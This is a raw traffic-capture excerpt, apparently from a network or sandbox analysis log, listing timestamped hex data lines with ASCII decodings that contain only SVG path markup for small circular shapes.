                                                                                                                                                                                                                                                                    Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2777INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2793INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                    Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2809INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2825INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                    Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2841INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2857INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                    Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2873INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2889INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                    Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2905INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                    Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2921INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2937INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2953INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2969INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                    Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC2985INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                    Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3001INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3017INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                    Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3033INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
